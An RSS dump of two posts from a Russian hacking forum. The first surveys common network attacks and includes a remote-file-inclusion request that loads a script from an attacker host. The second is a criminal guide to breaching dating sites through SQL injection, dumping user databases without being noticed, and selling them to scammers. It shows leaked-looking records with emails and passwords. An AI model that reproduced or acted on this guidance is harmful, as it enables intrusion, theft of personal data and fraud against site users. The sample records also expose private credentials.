http://hacking.forumbb.ru/ *Хакерский форум* ru-ru Sun, 17 Apr 2011 06:13:25 +0400 MyBB/mybb.ru http://hacking.forumbb.ru/viewtopic.php?pid=3#p3 <p>Данная статья скопирована с сайта-https://www.hackzone.ru/&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;<br />Здравствуйте,сегодня мы с вами поговорим о различных,наиболее распространённых сетевых хак-атаках,и изучим некоторые термины (которые для вас может ещё неизвестны).</p> <p>Хакерская атака-в узком смысле слова — в настоящее время под словосочетанием понимается «Покушение на систему безопасности», и склоняется скорее к смыслу следующего термина.</p> <p>Крэкерская атака-Это произошло из-за искажения смысла самого слова Хакер/Hacker</p> <p>Хакер/Hacker-(от англ. hack — разрубать) — чрезвычайно квалифицированный ИТ-специалист, человек, который понимает самые основы работы компьютерных систем. Это слово также часто употребляется для обозначения компьютерного взломщика, что в общем случае неверно.</p> <p>Хакерами называют, например, Линуса Торвальдса, Ричарда Столлмана и других создателей открытых систем мирового уровня. В России ярким примером хакера является Крис Касперски.</p> <p>Иногда этот термин применяют для обозначения специалистов вообще — в том контексте, что они обладают очень детальными знаниями в каких-либо вопросах, или имеют достаточно нестандартное и конструктивное мышление. С момента появления этого слова в форме компьютерного термина (произошедшего в 1960-е годы), у него появлялись новые, часто достаточно различные значения.</p> <p>Ну теперь о видах некоторых сетевых атак.</p> <p>Крэкерская атака-действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.<br />Изначально причиной атак послужил ряд ограничений, присущих протоколу TCP/IP. В ранних версиях протокола IP отсутствовали требования безопасности, которые появились только спустя несколько лет. Но только с бурным развитием интернет-коммерции проблема стала актуальной, и пришлось в сжатые сроки внедрять стандарты безопасности.</p> <p>P.S. Стек протоколов TCP/IP-(англ. Transmission Control Protocol/Internet Protocol) — собирательное название для сетевых протоколов разных уровней, используемых в сетях. Слово «стек» (англ. stack, стопка) подразумевает, что протокол TCP работает поверх IP.<br />В модели OSI данный стек занимает (реализует) все уровни и делится сам на 4 уровня: прикладной, транспортный, межсетевой, уровень доступа к сети (в OSI это уровни — физический, канальный и частично сетевой). На стеке протоколов TCP/IP построено всё взаимодействие пользователей в сети, от программной оболочки до канального уровня модели OSI. По сути это база, на которой завязано всё взаимодействие. При этом стек является независимым от физической среды передачи данных.</p> <p>P.S. OSI-Сетевая модель OSI (базовая эталонная модель взаимодействия открытых систем, англ. Open Systems Interconnection Basic Reference Model) — абстрактная сетевая модель для коммуникаций и разработки сетевых протоколов. Представляет уровневый подход к сети. Каждый уровень обслуживает свою часть процесса взаимодействия. Благодаря такой структуре совместная работа сетевого оборудования и программного обеспечения становится гораздо проще и прозрачнее.<br />В настоящее время основным используемым семейством протоколов является TCP/IP, разработка которого не была связана с моделью OSI.</p> <p>Следующий вид атаки,это<br />Mailbombing-Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер,Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом.</p> <p>Далее</p> <p>Переполнение буфера<br />Пожалуй, один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права.</p> <p>P.S. бинарный код-Двоичная система счисления — это позиционная система счисления с целочисленным основанием 2. В этой системе счисления натуральные числа записываются с помощью всего лишь двух символов (в роли которых обычно выступают цифры 0 и 1).</p> <p>Двигаемся далее</p> <p>Вирусы, троянские кони, почтовые черви, снифферы, Rootkit-ы и другие специальные программы<br />Следующий вид атаки представляет собой более изощренный метод получения доступа к закрытой информации — это использование специальных программ для ведения работы на компьютере жертвы. Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны, поэтому мы не будем рассматривать их в этой статье.</p> <p>Сетевая разведка<br />В ходе такой атаки хакер собственно не производит никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.<br />В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.</p> <p>P.S.<br />DNS-(англ. Domain Name System — система доменных имён) — распределённая система (распределённая база данных), способная по запросу, содержащему доменное имя хоста (компьютера или другого сетевого устройства), сообщить IP адрес или (в зависимости от запроса) другую информацию. DNS работает в сетях TCP/IP. Как частный случай, DNS может хранить и обрабатывать и обратные запросы, определения имени хоста по его IP адресу — IP адрес по таблице соответствия преобразуется в доменное имя, и посылается запрос на информацию типа «PTR».</p> <p>PTR-Ресурсные записи DNS — записи о соответствии имени и служебной информации в системе доменных имён.</p> <p>Сниффинг пакетов<br />Также довольно распространенный вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто откуда куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.</p> <p>P.S.<br />Сетевая карта-Сетевая плата, также известная как сетевая карта, сетевой адаптер, Ethernet-адаптер, NIC (англ. network interface controller) — периферийное устройство, позволяющее компьютеру взаимодействовать с другими устройствами сети.</p> <p>Promiscuous mode-или promisc mode — так называемый «неразборчивый» режим в котором сетевая плата позволяет принимать все пакеты независимо от того кому они адресованы, эта возможность обычно используется в сетевых анализаторах трафика.<br />В нормальном состоянии на Ethernet-интерфейсе используется фильтрация пакетов канального уровня и если MAC-адрес в заголовке назначения принятого пакета не совпадает с MAC-адресом текущего сетевого интерфейса и не является широковещательным, то пакет отбрасывается. В «неразборчивом» режиме фильтрация на сетевом интерфейсе отключается и все пакеты, включая не предназначенные текущему узлу, пропускаются в систему.<br />Большинство операционных систем требуют прав администратора для включения «неразборчивого» режима. Данный режим позволяет мониторить трафик только в данном коллизионном домене (для Ethernet или беспроводных сетей) или кольце (для сетей Token ring или FDDI), потому использование сетевых концентраторов является менее безопасным решением чем коммутаторов так как последние не передают трафик всем вне зависимости от адреса назначения.<br />«Неразборчивый» режим часто используется снифферами — специализированными программами позволяющими отображать и анализировать сетевой трафик для диагностики сетевых неполадок. Такие программы позволяют легко перехватывать пароли и конфиденциальные данные передаваемые по сети в незащищенном виде, чтобы избежать этого рекомендуется использовать защищенные протоколы, в том числе SSL и различные варианты VPN/IPSec.</p> <p>Сниффер-Анализатор трафика, или сниффер (от англ. to sniff — нюхать) — сетевой анализатор трафика, программа или программно-аппаратное устройство, предназначенное для перехвата и последующего анализа, либо только анализа сетевого трафика, предназначенного для других узлов.<br />Во время работы сниффера сетевой интерфейс переключается в т.н. «режим прослушивания» (Promiscuous mode), что и позволяет ему получать пакеты, адресованные другим интерфейсам в сети.<br />Перехват трафика может осуществляться:<br />обычным «прослушиванием» сетевого интерфейса (метод эффективен при использовании в сегменте концентраторов (хабов) вместо коммутаторов (свитчей), в противном случае метод малоэффективен, поскольку на сниффер попадают лишь отдельные фреймы);<br />подключением сниффера в разрыв канала;<br />ответвлением (программным или аппаратным) трафика и направлением его копии на сниффер;<br />через анализ побочных электромагнитных излучений и восстановление таким образом прослушиваемого трафика;<br />через атаку на канальном (2) (MAC-spoofing) или сетевом (3) уровне (IP-spoofing), приводящую к перенаправлению трафика жертвы или всего трафика сегмента на сниффер с последующим возвращением трафика в надлежащий адрес.<br />В начале 1990-х широко применялся хакерами для захвата пользовательских логинов и паролей, которые в ряде сетевых протоколов передаются в не зашифрованном или слабо зашифрованном виде. Широкое распространение хабов позволяло захватывать трафик без больших усилий в больших сегментах сети практически без риска быть обнаруженным.<br />Снифферы применяются как в благих, так и в деструктивных целях. Анализ прошедшего через сниффер трафика позволяет:<br />Обнаружить паразитный, вирусный и закольцованный трафик, наличие которого увеличивает загрузку сетевого оборудования и каналов связи (снифферы здесь малоэффективны; как правило, для этих целей используют сбор разнообразной статистики серверами и активным сетевым оборудованием и её последующий анализ).<br />Выявить в сети вредоносное и несанкционированное ПО, например, сетевые сканеры, флудеры, троянские программы, клиенты пиринговых сетей и другие (это обычно делают при помощи специализированных снифферов — мониторов сетевой активности).<br />Перехватить любой не зашифрованный (а порой и зашифрованный) пользовательский трафик с целью получения паролей и другой информации.<br />Локализовать неисправность сети или ошибку конфигурации сетевых агентов (для этой цели снифферы часто применяются системными администраторами)<br />Поскольку в «классическом» сниффере анализ трафика происходит вручную, с применением лишь простейших средств автоматизации (анализ протоколов, восстановление TCP-потока), то он подходит для анализа лишь небольших его объёмов.</p> <p>Думаю понятно,двигаемся дальше</p> <p>IP-спуфинг<br />Тоже распространенный вид атаки в недостаточно защищённых сетях, когда злоумышленник выдает себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого кракеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений .</p> <p>Man-in-the-Middle<br />Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне крякер может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — кража или фальсифицированные передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.</p> <p>P.S.<br />Канал связи-(англ. channel, data line) — система технических средств и среда распространения сигналов для передачи сообщений (не только данных) от источника к получателю (и наоборот). Канал связи, понимаемый в узком смысле, представляет только физическую среду распространения сигналов, например, физическую линию связи.<br />От источника сообщения (говорящего человека) сообщение (речь) поступает на вход передающего устройства (микрофон). Передающее устройство преобразует сообщение в сигналы, которые поступают на вход канала связи. На выходе канала связи приемное устройство (телефонный капсюль) по принятому сигналу воспроизводит переданное сообщение, последнее воспринимается приемником сообщения (слушающим человеком).<br />Передатчик, канал связи и приёмник формируют систему передачи информации или систему связи.<br />По назначению системы связи разграничивают каналы телесигнализации, телеизмерения, телеуправления (телекомандные), телеграфные, телефонные, звукового вещания, факсимильные, телевизионного вещания и т.д.</p> <p>Инъекция<br />Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате — получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.</p> <p>Теперь подробнее о видах инъекций</p> <p>SQL-инъекция-атака, в ходе которой изменяются параметры SQL-запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.</p> <p>SQL-Structured Query Language — язык структурированных запросов) — универсальный компьютерный язык, применяемый для создания, модификации и управления данными в реляционных базах данных.<br />Вопреки существующим заблуждениям, SQL в его чистом (базовом) виде является информационно-логическим языком, а не языком программирования. Вместе с тем стандарт языка спецификацией SQL/PSM предусматривает возможность его процедурных расширений, с учётом которых язык уже вполне может рассматриваться в качестве языка программирования.<br />SQL основывается на реляционной алгебре.<br />Язык SQL делится на четыре части:</p> <p>операторы определения данных (англ. Data Definition Language, DDL)<br />операторы манипуляции данными (англ. Data Manipulation Language, DML)<br />операторы определения доступа к данным (англ. Data Control Language, DCL)<br />операторы управления транзакциями (англ. Transaction Control Language, TCL)</p> <p>PHP-инъекция<br />Один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости , как не экранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом: </p> <p>Код:<br />GET //modules/threadstop threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? .<br />PHP- PHP: Hypertext Preprocessor — «PHP: препроцессор гипертекста», англ. Personal Home Page Tools— «Инструменты для создания персональных веб-страниц») — скриптовый язык общего назначения, изначально созданный для генерирования HTML-страниц на веб-сервере. Наибольшее распространение получил в области веб-разработки. В настоящее время поддерживается подавляющим большинством хостинг-провайдеров. Входит в LAMP — распространённый набор для создания веб-сайтов (Linux, Apache, MySQL, PHP).<br />Группа разработчиков PHP состоит из множества людей, добровольно работающих над ядром и расширениями PHP и смежными проектами, такими как PEAR или документация языка.</p> <p>Межсайтовый скриптинг или XSS<br />Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего &quot;Джаваскрипт&quot;. Другие названия: CSS, реже — скрипт-инъекция.</p> <p>XSS-Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.<br />Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».<br />Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP- Cookies могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.</p> <p>Джаваскрипт-скриптовый язык, чаще всего использующийся при создании сценариев поведения браузера, встраиваемых в веб-страницы. Является одной из реализаций языка ECMAScript. Языком ДжаваСкрипт не владеет какая-либо компания или организация, что отличает его от ряда языков программирования, используемых в веб-разработке.<br />Название «ДжаваСкрипт» является зарегистрированным товарным знаком компании Sun Microsystems, Inc.</p> <p>HTML код-HyperText Markup Language — «язык разметки гипертекста») — стандартный язык разметки документов во Всемирной паутине. Большинство веб-страниц создаются при помощи языка HTML (или XHTML). Язык HTML интерпретируется браузером и отображается в виде документа, в удобной для человека форме.<br />HTML является приложением SGML (стандартного обобщённого языка разметки) и соответствует международному стандарту ISO 8879.</p> <p>XPath-инъекция<br />Вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.</p> <p>XPath-(XML Path Language) - язык запросов к элементам XML-документа.<br />Он был разработан для организации доступа к частям документа XML в файлах трансформации XSLT, и является стандартом консорциума W3C.<br />В XPath используется компактный синтаксис, отличный от принятого в XML.<br />В 2007 году завершилась разработка версии 2.0, которая теперь является составной частью языка XQuery.</p> <p>XML-eXtensible Markup Language — расширяемый язык разметки; произносится [экс-эм-э&#769;л]) — рекомендованный Консорциумом Всемирной паутины язык разметки, фактически представляющий собой свод общих синтаксических правил. XML — текстовый формат, предназначенный для хранения структурированных данных (взамен существующих файлов баз данных), для обмена информацией между программами, а также для создания на его основе более специализированных языков разметки (например, XHTML), иногда называемых словарями. XML является упрощённым подмножеством языка SGML.<br />Целью создания XML было обеспечение совместимости при передаче структурированных данных между разными системами обработки информации, особенно при передаче таких данных через Интернет. Словари, основанные на XML (например, RDF, RSS, MathML, XHTML, SVG), сами по себе формально описаны, что позволяет программно изменять и проверять документы на основе этих словарей, не зная их семантики, то есть не зная смыслового значения элементов. Важной особенностью XML также является применение так называемых пространств имён.</p> <p>Социальная инженерия<br />(Social Engineering) — использование некомпетентности, непрофессионализма или небрежности персонала для получения доступа к информации. Этот метод обычно применяется без компьютера, с использованием обычного телефона, почтовой переписки либо кружечки пива. Таким образом обычно получается самая разнообразная информация. В ходе такой атаки злоумышленник устанавливает контакт с жертвой, и, вводя её в заблуждение либо войдя в доверие, пытается получить необходимые сведения, которые сложно получить другим путём, либо другие пути являются более рискованными.</p> <p>Отказ в обслуживании<br />DoS-(Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своем коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.</p> <p>DDoS-(Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.<br />Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм хакера и ценность информации, а так же недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения, и недостаточное внимание к вопросам безопасности в компании в принципе.</p> mybb@mybb.ru (Krogan) Sun, 17 Apr 2011 06:13:25 +0400 http://hacking.forumbb.ru/viewtopic.php?pid=3#p3 http://hacking.forumbb.ru/viewtopic.php?pid=2#p2 <p>Данная статья скопирована с сайта-https://www.hackzone.ru/<br />Одним из способов заработка для хакера является добывание баз данных. К сожалению в последние годы многие хакерские темы отмирают, в частности найти кредитные карты в шопах становится все труднее. Поэтому перед каждым взломщиком встает проблема - либо искать другие объекты для взлома, либо отказывать себе в пиве. </p> <p>Одними из таких объектов являются базы сайтов знакомств, на которые пока существует постоянный спрос у отечественных скамеров. Поработав некоторое время в этой тематике я приобрел кой какой опыт, который готов разделить с тобой. </p> <p>Начнем с начала, с выбора объекта. Масса форумов пестрит предложениями для хакера по взлому датингов, и как правило народ хочет базы таких ресурсов как match.com или americansingles.com. Можешь конечно попробовать их взломать, но во-первых они хорошо защищены, во-вторых, даже если тебе удастся получить доступ к базе и ее слить, ты получишь массу претензий от недовольного клиента ее купившего. Однажды нам с напарником удалось вытащить базу на лимон с лишним юзеров одного серьезного европейского датинга. В итоге мы получили массу претензий от ее покупателя. Суть претензий заключалась в том, что отписка была низкой, часть отписавшихся утверждали, что на данном ресурсе они не зарегистрированы, хотя мы предоставили покупателю не только мыла, но и логины с паролями, так что проверить принадлежность юзеров к данному датингу не было проблемой. В итоге нам удалось разобраться, с чем это связано. Ресурсу было уже более 8 лет и те, кто регался там лет 6-7 назад, либо уже давно женились, либо забыли о своей регистрации. И кроме того, там оказалось огромное количество аккаунтов африканцев из бывших колоний этой европейской страны, но это уже претензии не к нам, а к колониальной политике сверхдержав в XIX-XX веках. </p> <p>Поэтому предпочтительно ломать либо датинги которым от силы года 2-3, либо (если сайт создан давно) сливать только данные юзеров зарегистрировавшихся год или два назад. </p> <p>Хорошим спросом пользуются западно-европейские базы, США тоже не плохо идет, как и Арабские Эмираты, Япония и Австралия. Остальное мусор. И еще, периодически на форумах встречаются предложения взломать гей-датинги. Смысла особого в этом нет, я однажды повелся на подобные предложения и не только травмировал себе психику насмотревшись на голозадых «тружеников тыла», но и уже более двух месяцев не могу сбыть базы порядка 700К юзеров с гей-датингов даже по депинговой цене. </p> <p>Когда с объектом определились, начинается сам процесс взлома. Тут тебе помогут знания SQL-инъекций в MySQL, MSSQL, PostgreSQL. Мой опыт показывает, что 95% взломанных датингов содержали уязвимости класса SQL-инъекции. Так что штудируй мануалы и вперед, благо в информации по SQL-инъекциям недостатка нет. </p> <p>И вот доступ к базе получен, осталось сдампить базу и искать покупателя. Но здесь тоже есть свои нюансы. Если нет возможности залить на сайт скрипт для коннекта к базе или если админка не позволяет сдампить базу, придется тянуть ее с помощью SQL-дамперов. В этом случае дампить надо следующие поля - gender или sex (пол), данное поле лучше выводить первым, тогда потом будет легче отсортировать дамп и удалить из него ненужных скамерам женщин, логин и пароль – это для того, чтобы клиент купивший базу мог проверить, что она именно с этого датинга, email – это понятно, ради него собственно все и затевается, страна проживания – очень немаловажный фактор в случае взлома интернациональных датингов, и возраст. Последний параметр в принципе не обязателен, и клиенты требуют его крайне редко. Остальное не нужно. Т.е. данные должны быть примерно в таком виде: </p> <p>Male : diver_rat : liverpool : david@burkey.f2s.com : UK : 42 : <br />Male : moussa : soumou : mrezig@hotmail.com : USA : 48 : <br />Female : jessy1234 : 12345 : simjoo1234@yahoo.com : USA : 28 : <br />Male : kabbsites@yahoo.com : janneh : kabbsites@yahoo.com : USA : 31 : </p> <p>Кстати, для сортировки и удаления дублей в базе можешь использовать перл-скрипт следующего содержания: </p> <p>#!/usr/bin/perl <br />print &quot;===================================n&quot;; <br />print &quot;= John The Ripper wordlist sort =n&quot;; <br />print &quot;===================================n&quot;; <br />print &quot;= coded by durito 30.03.2005 =n&quot;; <br />print &quot;= LwB Security Team =n&quot;; <br />print &quot;= * vlb4g * durito * M0rf * =n&quot;; <br />print &quot;= * XSPYD3X * Gotius * mosg * =n&quot;; <br />print &quot;= <a href="http://lwb57.org" rel="nofollow" target="_blank">http://lwb57.org</a> =n&quot;; <br />print &quot;===================================n&quot;; <br />print &quot;= 1.txt + 2.txt &gt; 3.txt =n&quot;; <br />print &quot;===================================n&quot;; <br />open(F, '1.txt'); <br />while (defined($a=)) <br />{ <br />chomp($a); <br />$k{$a}=1; <br />} <br />close F; </p> <p>open(F, '2.txt'); <br />while (defined($a=)) <br />{ <br />chomp($a); <br />$k{$a}=2; <br />} <br />close F; </p> <p>open(F, '&gt;3.txt'); <br />foreach (sort keys(%k)) <br />{ <br />print F $_,&quot;n&quot;; <br />} <br />close F; </p> <p>Я когда-то давно написал его для объединения и сортировки словарей John The Ripper, но и с нашей задачей он справится. </p> <p>Переименовываешь базу в 1.txt, запускаешь скрипт, не забыв предварительно установить ActivePerl, и на выходе получаешь отсортированный по алфавиту 3.txt. </p> <p>Еще раз повторяю - если база большая, то дампить ее начинай с конца, допустим с последних 100К записей, слил их - потом тех, кто перед ними и так далее, во-первых это наиболее свежие юзеры, во-вторых если ресурс серьезный, то твои действия могут быстро обнаружить и дыру залатать прежде, чем ты выкачаешь всю базу. </p> <p>Ну вот, база снята, начинается не менее трудный процесс продажи базы. В среднем цена на датинг базы колеблется от 3$ до 10$ за 1К юзеров. Все зависит от уровня датинга, объема базы (чем она больше, тем больше скидка клиенту), страны и т.д. </p> <p>Тут начинающего продавца поджидает пара неприятных моментов, первым из которых является требование клиентов дать на пробу 1К-2К базы. После этого процентов 95 клиентов пропадают навсегда. А твоя база вследствие этого теряет, как говаривал мой учитель по труду в школе, &quot;целкость&quot;. Поэтому мой совет, если клиент хочет взять на пробу 1К-2К, то пусть за них заплатит. Это с одной стороны покажет его серьезность как потенциального покупателя, с другой убережет тебя от кидков. </p> <p>Второй неприятный момент: ты продал несколько хороших баз и тут к тебе начинают стучать челы с предложением продать их еще раз. Запомни, твоя репутация стоит дороже нескольких пригоршней долларов, поэтому продавай базу всегда в ОДНИ РУКИ. Это будет работать на твой имидж, который (в отличие от рекламы спрайта) в нашем деле как раз ВСЕ. Поэтому не надо жадничать и продавать одну и ту же базу нескольким клиентам. Тем более, что через какое-то время клиент, взявший у тебя хорошую базу, обратится к тебе за новой.</p> mybb@mybb.ru (Krogan) Sun, 17 Apr 2011 06:02:14 +0400 http://hacking.forumbb.ru/viewtopic.php?pid=2#p2